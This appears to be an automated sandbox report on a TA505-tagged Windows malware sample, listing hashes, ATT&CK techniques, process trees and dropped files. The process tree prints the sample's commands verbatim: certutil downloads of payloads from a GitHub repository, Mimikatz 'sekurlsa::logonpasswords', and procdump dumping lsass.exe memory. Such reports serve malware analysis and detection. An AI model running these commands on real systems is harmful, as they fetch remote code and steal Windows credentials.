ta505 | df9018383b6488d0c89bbf7063bd1143877ec6f99abf55b1c6846457baa7e080

Resubmissions

13-12-2023 16:00

231213-tfqc8sgdh6 10

13-12-2023 15:46

231213-s7452agch8 10

Analysis

max time kernel
120s
max time network
122s
platform
windows7_x64
resource
win7-20231130-en
resource tags

arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system
submitted
13-12-2023 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
Size

3.9MB
MD5

37130df0dc6057afaf677c2907eebdb4
SHA1

75caff36d1115049d605f91a651bf0f8479118cc
SHA256

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c
SHA512

357185b2e36508485329a13792a9741ea5040db09b482e6ce10a67581f982883df79b0367a53bb8fcc2574fcdf2dddb97ced0303dfd72a1ee670182bf8001274
SSDEEP

49152:WYS35HobXrb/TavO90dL3BmAFd4A64nsfJoJLNXdCVpo/MFKQm8cjdFiMLz4zy4y:WYCobCJZ0S5Qmxvl4fEwe8xj/E

Score

10^/10

ta505

Malware Config

Signatures

TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
ta505
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
800	procdump.exe
1888	procdump64.exe

Loads dropped DLL 1 IoCs

pid	Process
800	procdump.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
800	procdump.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
800	procdump.exe
800	procdump.exe
1888	procdump64.exe
1888	procdump64.exe
1888	procdump64.exe
1888	procdump64.exe
1888	procdump64.exe
1888	procdump64.exe
1888	procdump64.exe
1888	procdump64.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	800	procdump.exe
Token: SeDebugPrivilege	1888	procdump64.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 2932 wrote to memory of 2384	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	24
PID 2932 wrote to memory of 2384	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	24
PID 2932 wrote to memory of 2384	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	24
PID 2384 wrote to memory of 2136	2384	cmd.exe	23
PID 2384 wrote to memory of 2136	2384	cmd.exe	23
PID 2384 wrote to memory of 2136	2384	cmd.exe	23
PID 2932 wrote to memory of 2228	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	35
PID 2932 wrote to memory of 2228	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	35
PID 2932 wrote to memory of 2228	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	35
PID 2228 wrote to memory of 2504	2228	cmd.exe	32
PID 2228 wrote to memory of 2504	2228	cmd.exe	32
PID 2228 wrote to memory of 2504	2228	cmd.exe	32
PID 2932 wrote to memory of 2444	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	34
PID 2932 wrote to memory of 2444	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	34
PID 2932 wrote to memory of 2444	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	34
PID 2444 wrote to memory of 2464	2444	cmd.exe	33
PID 2444 wrote to memory of 2464	2444	cmd.exe	33
PID 2444 wrote to memory of 2464	2444	cmd.exe	33
PID 2932 wrote to memory of 2480	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	36
PID 2932 wrote to memory of 2480	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	36
PID 2932 wrote to memory of 2480	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	36
PID 2932 wrote to memory of 2500	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	38
PID 2932 wrote to memory of 2500	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	38
PID 2932 wrote to memory of 2500	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	38
PID 2500 wrote to memory of 2528	2500	cmd.exe	37
PID 2500 wrote to memory of 2528	2500	cmd.exe	37
PID 2500 wrote to memory of 2528	2500	cmd.exe	37
PID 2932 wrote to memory of 1056	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	44
PID 2932 wrote to memory of 1056	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	44
PID 2932 wrote to memory of 1056	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	44
PID 1056 wrote to memory of 800	1056	cmd.exe	43
PID 1056 wrote to memory of 800	1056	cmd.exe	43
PID 1056 wrote to memory of 800	1056	cmd.exe	43
PID 1056 wrote to memory of 800	1056	cmd.exe	43
PID 2932 wrote to memory of 1160	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	41
PID 2932 wrote to memory of 1160	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	41
PID 2932 wrote to memory of 1160	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	41
PID 1160 wrote to memory of 1524	1160	cmd.exe	39
PID 1160 wrote to memory of 1524	1160	cmd.exe	39
PID 1160 wrote to memory of 1524	1160	cmd.exe	39
PID 800 wrote to memory of 1888	800	procdump.exe	42
PID 800 wrote to memory of 1888	800	procdump.exe	42
PID 800 wrote to memory of 1888	800	procdump.exe	42
PID 800 wrote to memory of 1888	800	procdump.exe	42
PID 2932 wrote to memory of 848	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	45
PID 2932 wrote to memory of 848	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	45
PID 2932 wrote to memory of 848	2932	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	45

C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
"C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2384
- C:\Windows\system32\cmd.exe
  cmd /c "expand mim mimi.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2444
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -decode mim.b mim"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2228
- C:\Windows\system32\cmd.exe
  cmd /c "start mimi.exe" log privilege::debug sekurlsa::logonpasswords
  2⤵
  PID:2480
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2500
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1160
- C:\Windows\system32\cmd.exe
  cmd /c "start procdump.exe -accepteula -ma lsass.exe lsass.dmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1056
- C:\Windows\system32\cmd.exe
  cmd /c "start gg.lnk"
  2⤵
  PID:848

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b
1⤵
PID:2136

C:\Windows\system32\certutil.exe
certutil -decode mim.b mim
1⤵
PID:2504

C:\Windows\system32\expand.exe
expand mim mimi.exe
1⤵
PID:2464

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe
1⤵
PID:2528

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk
1⤵
PID:1524

C:\Users\Admin\AppData\Local\Temp\procdump64.exe
procdump.exe -accepteula -ma lsass.exe lsass.dmp
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Users\Admin\AppData\Local\Temp\procdump.exe
procdump.exe -accepteula -ma lsass.exe lsass.dmp
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
55e201e33571acb4d2727de760626c0a

SHA1
764a304a9871ada2a14b4141ebb2beade6b9a80d

SHA256
724c8b547226d880100223c7c29fb78f2f40f1130930859f28902f846c209639

SHA512
8222b5ab57c0ca79fb5f136359621bf6fbda40084567427b0398415bdbaa576da192ec92bb7ac37e131b17ca7d300b640f8f0a6acdb307210278dac3f1e68042

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
9faf1b7039ee582278f8f1c9267e4038

SHA1
2277fef7c0d68942acdd7e8f65025d2f7691af0f

SHA256
b3511fe13aa2c96fba4ac316d809c1d66584bc2ee0faa816389527574c4cf963

SHA512
a2ac101670b211bd630364c64ff6cde9f34d5b5a830a666f4e704570e7ec254b7be5c974dbb6e129e317f199641dcf2ec8138951ec5113c92f13faabfa039ac3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3574.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\gg.lnk

Filesize
190KB

MD5
a817339e4e0a6e11670fbf246c271164

SHA1
f6f9f9a753b8266ff0bd97c45fad93d7da7b520d

SHA256
154e8c87a40a34f338338a92de0430dcae2905ea0d4d237c25e67fe2facd0c9c

SHA512
6e5773cfff5ed9b264a2a6efd40be38626b35a636ed2050d0fe2a22f1557bda57a0fd20ffef258b43d6c06325c115db72b92ab6563f9953ff492becab5b6aadd

Download Submit
C:\Users\Admin\AppData\Local\Temp\mim.b

Filesize
14B

MD5
3be7b8b182ccd96e48989b4e57311193

SHA1
78fb38f212fa49029aff24c669a39648d9b4e68b

SHA256
d5558cd419c8d46bdc958064cb97f963d1ea793866414c025906ec15033512ed

SHA512
f3781cbb4e9e190df38c3fe7fa80ba69bf6f9dbafb158e0426dd4604f2f1ba794450679005a38d0f9f1dad0696e2f22b8b086b2d7d08a0f99bb4fd3b0f7ed5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump.exe

Filesize
773KB

MD5
f2091c44d89789f689d98bc244358878

SHA1
db1ef4ce56820c93a3b7f1fdf36d3fffc7d1ec96

SHA256
e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc

SHA512
95fea3d3e28ac1b67bc7d5996d9af81da31f867bc47c27a0b1a3bed42d2c5347e4746a2a83d435176c6b483a2e387a8fa5fec80bcf745ec5b250ac6d646dfae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump64.exe

Filesize
414KB

MD5
68a1f7c796de1d0df6b2d78e182df3a0

SHA1
43e3521e0403636150ac0c6c4da6a536f0ab504f

SHA256
5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61

SHA512
616f2f165c8a32eca18a9f2ef14325c1d89c1ae97efd8c89eaa9adc9f527b940700a5c9ede93ae2218e0b58553a23effc6a4e48b8498eb83cfc723cbcf241d01

Download Submit
memory/848-91-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download